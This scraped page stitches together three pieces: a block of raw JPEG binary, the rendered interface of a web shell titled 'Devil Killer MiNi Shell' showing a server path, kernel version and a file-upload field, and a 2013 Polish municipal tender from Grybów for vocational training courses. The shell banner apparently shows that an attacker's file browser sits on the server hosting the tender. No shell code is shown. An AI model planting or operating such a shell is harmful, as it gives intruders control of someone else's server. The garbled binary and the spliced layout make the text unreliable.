JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131017/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131017/217067-N-2013.html

<p class="kh_header"><b>Grybów: Organizacja i przeprowadzenie szkoleń - kursów z zakresu przygotowania zawodowego dla Beneficjentów Ostatecznych biorących udział w realizowanych przez Gminny Ośrodek Pomocy Społecznej w Grybowie projekcie systemowym PO KL pt: Nowe perspektywy - nowe szanse!, na podstawie umowy zawartej z Wojewódzkim Urzędem Pracy w Krakowie o dofinansowanie wyżej wskazanego projektu w ramach Poddziałania 7.1.1, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 217067 - 2013; data zamieszczenia: 17.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek  Pomocy Społecznej w Grybowie , ul. Jakubowskiego 33, 33-330 Grybów, woj. małopolskie, tel. 18 448 42 46, faks 18 448 42 46.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkoleń - kursów z zakresu przygotowania zawodowego dla Beneficjentów Ostatecznych biorących udział w realizowanych przez Gminny Ośrodek Pomocy Społecznej w Grybowie projekcie systemowym PO KL pt: Nowe perspektywy - nowe szanse!, na podstawie umowy zawartej z Wojewódzkim Urzędem Pracy w Krakowie o dofinansowanie wyżej wskazanego projektu w ramach Poddziałania 7.1.1, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa polegająca na organizacji, przygotowaniu                    i przeprowadzeniu szkoleń - kursów tj: Sprzedawca z obsługą kasy fiskalnej oraz programami magazynowo - fakturującymi dla 9 osób, Fryzjer dla 2 osób Opiekun osób starszych dla 5 osób, oraz Florystyka z ozdobnym pakowaniem dla 8 osób z terenu Gminy Grybów w ramach projektu systemowego Programu Operacyjnego Kapitał Ludzki pt: Nowe perspektywy - nowe szanse!, zadanie 1 Aktywna integracja. Projekt realizowany jest przez Gminny Ośrodek Pomocy Społecznej w Grybowie w ramach Programu Operacyjnego Kapitał Ludzki, Działanie 7. 1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.

2. Program szkolenia winien być przeprowadzony zgodnie z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 r. w sprawie standardów i warunków prowadzenia usług na rynku pracy (Dz. U. Nr 177, poz. 1193 ze zm.).
3. Przedmiot zamówienia został opisany poniżej i obejmuje opracowanie zakresu tematycznego szkoleń - kursów w następujący sposób:

a) Kurs Sprzedawca z obsługą kasy fiskalnej oraz programami magazynowo - fakturującymi:
Obsługa kasy fiskalnej w połączeniu z komputerem - cześć teoretyczna i praktyczna:
a) Obsługa kas fiskalnych:
-   podstawowe akty prawne związane z zastosowaniem kas fiskalnych,
-   budowa, zasady działania oraz podział urządzeń fiskalnych,
-   przygotowanie kasy do pracy,
- sprzedaż, wykonywanie raportów, współpraca kas z urządzeniami dodatkowymi - czytnikiem kodów, komputerem,
-  praca kasjera (odpowiedzialność, raport kasowy, ochrona wartości pieniężnych, niedobory     i nadwyżki w kasie itp.),
-   kontakt z klientem.
b) Obsługa komputera:
-  podstawowe procedury Windows, praca z komputerem (uruchomienie, używanie myszki,   terminologia, okna programowe, używanie okien dialogowych i pasków narzędzi itp.),
-  główne metody pracy z pakietem Offis (wprowadzanie tekstu, zaznaczanie i zastępowanie tekstu, zaznaczanie i formatowanie obiektów, ustawianie marginesów na stronie, wybór drukarki i drukowanie, zapamiętywanie pliku i ponowne otwieranie itp.),
- komunikowanie się droga elektroniczną, podstawowe umiejętności w obsłudze Internetu.
Obsługa programów magazynowo - fakturujących - cześć teoretyczna i praktyczna:
a) Obsługa Programu Subiekt:
-  tabela, lista kontrahentów, towarów i usług, wyszukiwarka Instynkt, typowe elementy okien, funkcje i skróty klawiszowe.
Główne moduły: kartoteka kontrahentów, towarów i usług, dokumenty handlowe, sprzedaż - faktury i rachunki, zakupy - faktury i rachunki, magazyn, finanse, zestawienia, administracja.
Podstawowe pojęcia: podmiot, magazyn, kontrahenci, personel, Urząd Skarbowy, rachunki bankowe, towary i usługi, dokumenty, kasy, stawki VAT, rabaty, formy płatności, należności i zobowiązania, odsetki, kategorie, grupy, wydruki, urządzenia fiskalne.
b) fakturowanie komputerowe:
-   faktury - zakres i zastosowanie: faktury VAT i faktura korygująca, faktury wewnętrzne, faktury: VAT RR, VAT UE, VAT MP, VAT marża, handlowe,
-   elementy obowiązkowe faktury,
-   zasady wystawiania faktur,
-   nierzetelność faktury,
-   faktura korygująca a nota korygująca - różnice i zastosowanie,
-   faktury przy zaliczce,
-   faktury wystawiane elektronicznie,
-   faktury wystawiane przez przedstawiciela podatkowego,
-   dowody mające wpływ na stawkę opodatkowania podatkiemVAT,
-   klasyfikacja statystyczna ważnym elementem faktury,
-   czy warto podpisywać faktury?
-   praktyczne obowiązki wystawiających i osób księgujących faktury,
c)  zasady gospodarki magazynowej:
- organizacja prac magazynowych w przedsiębiorstwie (przyjecie, składowanie, kompletowanie, wydawanie).
- manipulacje materiałami i pakowanie: manipulacje materiałami, podział sprzętu do manipulacji materiałami ze względu na jego konstrukcję i kryteria jego wyboru, opakowanie i jego wymogi projektowe, kody kreskowe, konteneryzacja, koncepcja systemu informacji logistycznej,
d) technologie prac magazynowych: charakterystyka technologicznego procesu magazynowania, proces magazynowy (czynności przyjęcia towarów do magazynu), zasady     i kryteria ustalenia miejsc składowania, procedury i dokumenty dostawy, proces magazynowy (czynności kompletacji i wydania z magazynu a w nim: określenie ścieżki kompletacyjnej jedno i dwustopniowej, określenie zasad i miejsc grupowania asortymentów wg  zleceń wydania, przepakowania i zabezpieczania asortymentów do wysyłki, załadunku i wysyłki do odbiorców),
e) BHP na stanowisku pracy osoby fakturującej i magazyniera oraz podstawowe zasady higieny.
f) gospodarka zapasami: znaczenie zapasów, przyczyny utrzymywania zapasów, koszty           i klasyfikacja zapasów, podstawowe decyzje w zarządzaniu zapasami, metoda stałej wielkości zamówienia przy znanym i pewnym popycie.
    oraz przy niepewnym (nieokreślonym) popycie, metoda stałego okresu zamówienia, tradycyjne metody zarządzania zapasami.
g) inwentaryzacja stanów magazynowych: pobranie aktualnych stanów magazynowych, wydruk spisu z natury dla komisji inwentaryzacyjnej, wprowadzenie ilości spisanych przez komisję do programu, aktualizacja stanów magazynowych, wydruk remanentu, rodzaje inwentaryzacji, inwentaryzacja ręczna, inwentaryzacja elektroniczna prowadzona przy pomocy inwentaryzatora,
h) cele, zadania i wyposażenie magazynu: wymagania dotyczące obiektu magazynowego wynikające z warunków przechowywania, urządzenia do składowania, środki transportu, pomocnicze urządzenia magazynowe, funkcje i rodzaje magazynów.
Liczba godzin szkoleniowych grupowych (dla grupy 9 osób - minimum 60 godzin w ciągu 10 dni po 6 godzin dziennie).
Za godzinę zegarową kursu Sprzedawcy z obsługą kasy fiskalnej i programami magazynowo - fakturującymi przyjmuje się 45 minut zajęć edukacyjnych oraz 15 minut przerwy.

b) Kurs Opiekun osób starszych:
Zakres tematyczny obejmuje aspekty teoretyczne jak i praktyczne:
a) zajęcia organizacyjne:
- zapoznanie się z wyposażeniem i sprzętem,
- zasady BHP,
- ochrona przed zakażeniem, dezynfekcja, sterylizacja,
b) rola i zadania opiekuna osób, formy opieki i pomocy ludziom starszym, i dzieciom, sylwetka zawodowa opiekuna,
c) anatomia z fizjologią,
d) procesy zachodzące w organizmie człowieka człowieka,
e) postawa wobec uczuć i sposobu zachowania pielęgnowanej osoby,
f) choroby, obserwacja chorego, pomiar parametrów,
g) problemy opieki chorych niepełnosprawnych,
h) zabiegi pielęgnacyno-higieniczne u osoby dorosłej, pielęgnowanie dziecka, /udogodnienia, środki pielęgnacyjne, materac przeciwodleżynowy, rynienki do mycia głowy, bielizna osobista i pościelowa, sprzęt do przemieszczania chorych; podnośnik, wózek inwalidzki 
i) profilaktyka odleżyn oraz skutków długotrwałego unieruchomienia,
j) aspekty pielęgnacyjne rehabilitacji,
k) opieka nad umierającym i towarzyszenie śmierci,
l) pierwsza pomoc,
ł) farmakoterapia
m) zasady żywienia ludzi chorych, starszych, dzieci i niepełnosprawnych,
n) wykonywania pomiarów: 
- ciśnienia tętniczego krwi z wykorzystaniem różnego rodzaju aparatów: sprężynowych, elektronicznych, nadgarstkowych
- temperatury ciała z wykorzystaniem termometrów alkoholowych, elektronicznych, na podczerwień
- poziomu cukru we krwi / glukometr/.
o) czynności w ramach pomocy przedmedycznej : 
- zakładania opatrunków na różne okolice ciała / bandaże, chusty trójkątne/
- zabiegów ożywiających / fantom dziecka i osoby dorosłej do prowadzenia zabiegów ożywiających/.
Liczba godzin szkoleniowych grupowych (dla grupy 5 osób - minimum 60 godzin w ciągu 10 dni po 6 godzin dziennie).
Za godzinę zegarową kursu Opiekun osób starszych przyjmuje się 45 minut zajęć edukacyjnych oraz 15 minut przerwy.
Zamawiający  wymaga aby kurs Opiekun osób starszych odbywał się w nieczynnym w czasie szkoleniowym przeprowadzania kursu zakładzie opieki medycznej.

c) Kurs: Fryzjer:
Zakres tematyczny obejmuje aspekty teoretyczne jak i praktyczne:
a) Informacje podstawowe:
- specyfika zawodu fryzjera,
- higiena w miejscu pracy, dezynfekcja, sterylizacja,
- choroby zawodowe,
- zasady BHP,
- historia sztuki fryzjerskiej,
- organizacja pracy w salonie fryzjerskim,
- standardowe wyposażenie salonu fryzjerskiego, profesjonalne stanowiska pracy,
b) Kosmetyka, struktura i właściwości włosów:
- powierzchnia włosa, wewnętrzna budowa włosa, jego choroby, rodzaje włosów - właściwości,
- budowa i funkcje skóry głowy,
- określenie jakości i stanu włosów,
- rodzaje uszkodzeń, zmiany,
- diagnoza stanu włosów i skóry głowy i włosów,
- nieprawidłowości i uszkodzenia skóry głowy i włosów,
- mycie włosów i masaż skóry głowy,
- nakładanie odżywki i preparatów pielęgnacyjnych,
c) Profesjonalna obsługa klienta:
- kontakt z klientem - wywiad, diagnoza, porada,
- analiza kształtów twarzy i głowy,
- dobór fryzur do kształtu twarzy,
d) Strzyżenie:
- rodzaje narzędzi fryzjerskich,
- typy i style fryzur,
- formy i linie fryzury,
- geometryczne elementy stylizacji,
- linie profilu, kontury,
- symetria i asymetria,
- podział głowy na sekcje,
- podstawowe linie fryzury: profile, symetrie i asymetrie,
- strzyżenie włosów długich, średnich i krótkich,
- podstawowe techniki strzyżeń tj: na tępo, punktowanie, strzyżenie niestopniowane, cieniowane, zdejmowanie objętości z końcówek, pikowanie, separowanie, stopniowanie, strzyżenie nożem chińskim, strzyżenie męskie, strzyżenie maszynką elektryczną, strzyżenie męskie, strzyżenie maszynką elektryczną ,
e) Ondulacja:
- trwała zmiana kształtu włosa,
- rodzaje preparatów do trwałej ondulacji,
- techniki nawijania włosów,
- przeprowadzenie zabiegu trwałej ondulacji,
- ondulacja częściowa,
- ondulacja końcówek i odrostów,
f) Koloryzacja:
- naturalne kolory włosów,
- analiza kolorystyczna,
- omówienie preparatów do koloryzacji,
- utlenianie, tonowanie, farbowanie,
- odbarwianie włosa,
- rozjaśnianie, przyciemnianie, naturalizacja włosów,
- koloryzacja powierzchniowa,
- technika nakładania farby,
- technika nakładania baleyage, metoda światłocienia, makijaż włosów, refleksy, koloryzacja zmywalna,
- farbowanie odrostów,
g) Stylizacja:
- rodzaje preparatów do stylizacji,
- modelowanie, suszenie bez użycia szczotki,
- modelowanie tradycyjne i modelowanie na prosto,
- nawijanie włosów na wałki: metoda klasyczna, metoda dostosowana do kształtu fryzury, nawijanie częściowe, końcówek, spiralne,
- upinanie, modelowanie, tapir, koki, fryzura ślubna, układanie fal, koki fantazyjne, upiecia z włosów długich i krótkich,
Liczba godzin szkoleniowych grupowych (dla grupy 2 osób - minimum 80 godzin w ciągu 14 dni po 6 godzin dziennie).
Za godzinę zegarową kursu Fryzjer przyjmuje się 45 minut zajęć edukacyjnych oraz 15 minut przerwy.
Zamawiający  wymaga aby kurs Fryzjera odbywał się w profesjonalnym nieczynnym w czasie szkoleniowym przeprowadzania kursu zakładzie fryzjerskim.

d) Kurs: Florystyka z ozdobnym pakowaniem
Zakres tematyczny obejmuje równocześnie elementy teoretyczne jak i praktyczne:
a) anatomia i fizjologia roślin:
- budowa anatomiczna roślin,
- budowa morfologiczna roślin,
- procesy fizjologiczne roślin,
- sposoby rozmnażania roślin,
b) zabiegi pielęgnacyjne roślin oraz szkodniki i choroby,
c) główne aspekty uprawy roślin ozdobnych:
- uprawy gruntowe,
- uprawy pod osłonami,
- produkcja roślin na termin,
d) asortyment roślin ozdobnych:
- rośliny cebulowe,
- rośliny bulwiaste,
- byliny,
- zioła,
- krzewy kwitnące,
- rośliny na żywopłoty,
- rośliny do zasuszania,
- rośliny kwietnikowe,
- rośliny doniczkowe,
- rośliny na kwiat cięty,
- zieleń cięta,
e)  metody utrwalania materiału roślinnego:
- metoda zielarska,
- metoda zielnikowa,
- metoda piaskowo - boraksowa,
- metoda glicerynowa,
- metody chemiczne,
f) główne czynniki zachowania kwiatów ciętych oraz pielęgnacja po ścięciu,
g) narzędzia środki techniczne do wykonania kompozycji ozdobnych tj: narzędzia, naczynia, środki pomocnicze itp.
h) artykuły dekoracyjne: trwałe i nietrwałe,
i) podstawowe zasady wykonywania kompozycji roślinnych:
- podział i właściwości barw,
- punkt i linie,
- płaszczyzna,
- struktura i faktura,
 j) wymagania estetyczne tworzenia kompozycji roślinnych,
k) style kompozycyjne:
- styl wegetatywny,
- styl dekoracyjny,
- styl formalno - linearny,
- styl formalny,
l) charakterystyka roślinnych układów kompozycyjnych,
ł) wykonywanie bukietów w ręce metodą paralelną i spiralną:
- bukiet okrągły mieszany,
- bukiet strukturalny,
- bukiet formalno - linearny,
- bukiet ażurowy,
m) florystyka żałobna:
- wiązanka pogrzebowa,
- wieniec rzymski,
n) florystyka ślubna i komunijna:
- wiązanka biedermaier,
- wiązanka angielska (spływająca),
o) dekoracje z roślin suchych i sztucznych - podstawowe zasady,
p) wykonanie kompozycji na stół i dekoracji w rożku z roślin suchych i sztucznych,
r) ozdobne pakowanie kwiatów i floralne pakowanie prezentów,
s) aranżacje kwiaciarni i wystawy okiennej - podstawowe zasady,
t) kompozycje roślinne na różne okazje np.: imieniny, święta itp.
u) rodzaje ozdobnego pakowania,
w) decoupage,
Liczba godzin szkoleniowych grupowych (dla grupy 8 osób - minimum 80 godzin w ciągu 14 dni po 6 godzin dziennie).
Za godzinę zegarową kursu Florystyka z ozdobnym pakowaniem przyjmuje się 45 minut zajęć edukacyjnych oraz 15 minut przerwy.

4. Informacje dodatkowe, które należy uwzględnić w cenie oferty:
Zajęcia odbywać się będą od poniedziałku do piątku w dniach pracy Zamawiającego                    w godzinach pomiędzy 800 - 1500.
Wykonawca zobowiązany jest zapewnić na czas trwania zajęć w ramach szkoleń - kursów                      w szczególności:
- Pomieszczenia przystosowane do wykonania  Przedmiotu zamówienia, które winny być klimatyzowane         z miejscem siedzącym dla każdego Uczestnika Projektu.
- Wyposażenie każdego Uczestnika  w bezzwrotne materiały piśmiennicze tj: notes, długopis, teczka tekturowa na gumkę, dziennik zajęć oraz materiały dydaktyczne, które należy oznaczyć logo Programu Operacyjnego Kapitał Ludzki, emblematem Unii Europejskiej           z podpisem Europejski Fundusz Społeczny.
- Otrzymanie przez każdego Uczestnika w przypadku trwania zajęć powyżej 4 godzin           w każdym dniu szkoleń - kursów - gorącego posiłku (obiad dwudaniowy, kompot). Produkty 
używane do przygotowania gorącego posiłku winny spełniać normy żywieniowe oraz sanitarno - epidemiologiczne.
- Otrzymanie przez każdego Uczestnika w trakcie zajęć w każdym dniu szkoleń - kursów serwisu kawowego tj: kawa, herbata, zimne napoje, suche ciastka, cukier, śmietanka do kawy, świeże owoce. Produkty podawane podczas serwisu kawowego winny spełniać normy żywieniowe oraz sanitarno - epidemiologiczne.
- Wykonawca zobowiązany jest prowadzić nadzór wewnętrzny nad prowadzonymi zajęciami tj: prowadzić imienne listy obecności, imienne potwierdzenia odbioru materiałów piśmienniczych i dydaktycznych, imienne potwierdzenia odbioru serwisu kawowego oraz gorącego posiłku, dzienniki zajęć, rejestry wydanych zaświadczeń i certyfikatów, potwierdzenia odbioru wydanych zaświadczeń i certyfikatów, ankiety na rozpoczęcie              i zakończenie, kserokopie zaświadczeń i książeczek zdrowia z przeprowadzonych badań lekarskich, testy wiedzy na rozpoczęcie i zakończenie, protokoły z egzaminów oraz dostarczyć ich Zamawiającemu. Powyższy nadzór wewnętrzny winien być prowadzony osobno dla wszystkich w/w szkoleń - kursów.
- Każda osoba winna mieć własne stanowisko wyposażone w urządzenia/ sprzęt niezbędny dla ukończenia szkolenia - kursu w np. osobny komputer, kasa fiskalna, osobne materiały dydaktyczne w zależności od rodzaju i tematyki kursu.
- Po zakończeniu w/w szkoleń - kursów Wykonawca wyda każdemu Uczestnikowi osobne dla każdego rodzaju wsparcia zaświadczenia i certyfikaty, a kopie potwierdzone za zgodność       z oryginałem przekaże Zamawiającemu.
- Każde szkolenie winno zakończyć się egzaminem.
- Wykonawca zapewni wszystkim Uczestnikom szkolenie BHP oraz odzież ochronną.
- Wszyscy Uczestnicy mają mieć zapewnione Ubezpieczenie od Następstw Nieszczęśliwych Wypadków.
- Zaleca się aby całość zamówienia realizowana była na terenie Gminy Grybów. Zamawiający dopuszcza jednak możliwość organizacji i przeprowadzenia szkoleń poza obszarem Gminy Grybów, w takim przypadku Wykonawca zapewni uczestnikom szkoleń transport tj. dojazd do miejsca szkolenia z Grybowa oraz powrót do Grybowa..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 13.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie powyższego warunku zamawiający uzna posiadanie przez Wykonawcę aktualnego wpisu do Rejestru Instytucji Szkoleniowych  prowadzonych przez Wojewódzki Urząd Pracy właściwy dla siedziby Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie tego warunku Zamawiający uzna wykonanie z należytą starannością w okresie trzech ostatnich lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), przed dniem składania ofert,  co najmniej czterech różnych usług, polegających na zorganizowaniu i przeprowadzeniu szkoleń - kursów: Sprzedawca z obsługą kasy fiskalnej i programami magazynowo - fakturującymi (jedna usługa), Opiekun osób starszych (druga usługa), Fryzjer (trzecia usługa) oraz Florystyka z ozdobnym pakowaniem (czwarta usługa), o tematyce zgodnej z wyszczególnioną w niniejszym zamówieniu w oparciu o tą, którą określono w Dziale 2 SIWZ, z podaniem ich wartości, nazwy zleceniodawcy, terminu realizacji (według wzoru stanowiącego Załącznik Nr 5 do SIWZ), a także załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie i łącznie
- wykonanie należycie głównych dostaw lub usług (tj. brak jakiejkolwiek głównej usługi lub dostawy w tym okresie, która zostałaby wykonana nienależycie), w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, (według wzoru stanowiącego Załącznik Nr 5 do SIWZ) oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;

Na podstawie złożonych dokumentów Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie powyższego warunku, Zamawiający uzna wykazanie przez Wykonawcę osób (kadra zawodowa - według wzoru stanowiącego Załącznik Nr 6 do SIWZ) mających uczestniczyć w realizacji przedmiotu zamówienia, posiadających kwalifikacje zawodowe niezbędne do realizacji zamówienia tj.:

- trener - osoba posiadająca uprawnienia pedagogiczne oraz ukończony kurs instruktorski       z zakresu obsługi kas fiskalnych, minimum 2 - letnie doświadczenie w charakterze trenera.
- trener - osoba uprawniona do przeprowadzenia kursu (szkolenia) w zawodzie opiekuna medycznego, kwalifikacje pielęgniarskie, minimum 2 - letnie doświadczenie w charakterze trenera oraz osoba posiadająca uprawnienia pedagogiczne.
- trener - osoba uprawniona do prowadzenia zajęć teoretycznych i praktycznych z zakresu fryzjerstwa, 2 - letnie doświadczenie w charakterze trenera, posiadająca uprawnienia pedagogiczne.
- trener - osoba uprawniona do prowadzenia zajęć teoretycznych i praktycznych z zakresu florystyki, 2 - letnie doświadczenie w charakterze trenera, posiadająca uprawnienia pedagogiczne.

Na podstawie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych (Załącznik Nr 3 do SIWZ) oraz wykazu kadry zawodowej proponowanej do wykonania usług (Załacznik Nr 6 do SIWZ) Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły : spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie powyższego warunku zamawiający uzna posiadanie przez Wykonawcę aktualnego wpisu do Rejestru Instytucji Szkoleniowych  prowadzonych przez Wojewódzki Urząd Pracy właściwy dla siedziby Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych (Załącznik Nr 3 do SIWZ) Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły : spełnia - nie spełnia.</p>
</li></ul></li></ul>
